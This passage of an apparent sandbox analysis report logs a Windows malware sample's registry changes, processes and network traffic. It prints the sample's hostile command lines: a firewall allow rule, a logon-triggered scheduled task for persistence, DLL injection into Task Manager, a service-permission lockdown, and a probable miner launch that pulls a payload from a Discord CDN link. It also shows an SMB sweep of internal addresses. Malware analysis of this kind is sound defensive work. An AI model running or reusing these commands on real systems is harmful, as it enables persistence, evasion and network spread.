| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2141 = "Transbaikal Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2391 = "Aleutian Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1912 = "Russia TZ 10 Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe
"C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe
"C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4fd84729-fedd-4a9e-b50a-5a6b58ae20c0.uuid.localstats.org | udp |
| US | 8.8.8.8:53 | server8.localstats.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun4.l.google.com | udp |
| BG | 185.82.216.111:443 | server8.localstats.org | tcp |
| US | 74.125.250.129:19302 | stun4.l.google.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | 129.250.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.221.67.172.in-addr.arpa | udp |
| BG | 185.82.216.111:443 | server8.localstats.org | tcp |
| BG | 185.82.216.111:443 | server8.localstats.org | tcp |
| US | 8.8.8.8:53 | 169.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| BG | 185.82.216.111:443 | server8.localstats.org | tcp |
| BG | 185.82.216.111:443 | server8.localstats.org | tcp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| CZ | 46.8.8.100:443 | tcp | |
| US | 8.8.8.8:53 | stun.ipfire.org | udp |
| DE | 81.3.27.44:3478 | stun.ipfire.org | udp |
| US | 8.8.8.8:53 | snickerfool.com | udp |
| NL | 80.79.4.25:80 | snickerfool.com | tcp |
| NL | 80.79.4.25:80 | snickerfool.com | tcp |
| US | 8.8.8.8:53 | 44.27.3.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.4.79.80.in-addr.arpa | udp |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.68:445 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.0.135:445 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.248:445 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.251:445 | tcp | |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.1.0:445 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.255:445 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.252:445 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.241:445 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.1.14:445 | tcp | |
| N/A | 10.127.1.31:445 | tcp | |
| N/A | 10.127.1.52:445 | tcp | |
| N/A | 10.127.1.6:445 | tcp | |
| N/A | 10.127.1.21:445 | tcp | |
| N/A | 10.127.1.15:445 | tcp | |
| N/A | 10.127.1.37:445 | tcp | |
| N/A | 10.127.1.61:445 | tcp | |
| N/A | 10.127.1.44:445 | tcp | |
| N/A | 10.127.1.29:445 | tcp | |
| N/A | 10.127.1.23:445 | tcp | |
| N/A | 10.127.1.47:445 | tcp | |
| N/A | 10.127.1.7:445 | tcp | |
| N/A | 10.127.1.26:445 | tcp | |
| N/A | 10.127.1.18:445 | tcp | |
| N/A | 10.127.1.45:445 | tcp | |
| N/A | 10.127.1.5:445 | tcp | |
| N/A | 10.127.1.20:445 | tcp | |
| N/A | 10.127.1.43:445 | tcp | |
| N/A | 10.127.1.59:445 | tcp | |
| N/A | 10.127.1.32:445 | tcp | |
| N/A | 10.127.1.42:445 | tcp | |
| N/A | 10.127.1.60:445 | tcp | |
| N/A | 10.127.1.35:445 | tcp | |
| N/A | 10.127.1.58:445 | tcp | |
| N/A | 10.127.1.56:445 | tcp | |
| N/A | 10.127.1.46:445 | tcp | |
| N/A | 10.127.1.28:445 | tcp | |
| N/A | 10.127.1.1:445 | tcp | |
| N/A | 10.127.1.55:445 | tcp | |
| N/A | 10.127.1.9:445 | tcp | |
| N/A | 10.127.1.39:445 | tcp | |
| N/A | 10.127.1.63:445 | tcp | |
| N/A | 10.127.1.38:445 | tcp | |
| N/A | 10.127.1.53:445 | tcp | |
| N/A | 10.127.1.62:445 | tcp | |
| N/A | 10.127.1.40:445 | tcp | |
| N/A | 10.127.1.13:445 | tcp | |
| N/A | 10.127.1.19:445 | tcp | |
| N/A | 10.127.1.27:445 | tcp | |
| N/A | 10.127.1.22:445 | tcp | |
| N/A | 10.127.1.33:445 | tcp | |
| N/A | 10.127.1.12:445 | tcp | |
| N/A | 10.127.1.34:445 | tcp | |
| N/A | 10.127.1.8:445 | tcp | |
| N/A | 10.127.1.48:445 | tcp | |
| N/A | 10.127.1.4:445 | tcp | |
| N/A | 10.127.1.30:445 | tcp | |
| N/A | 10.127.1.3:445 | tcp | |
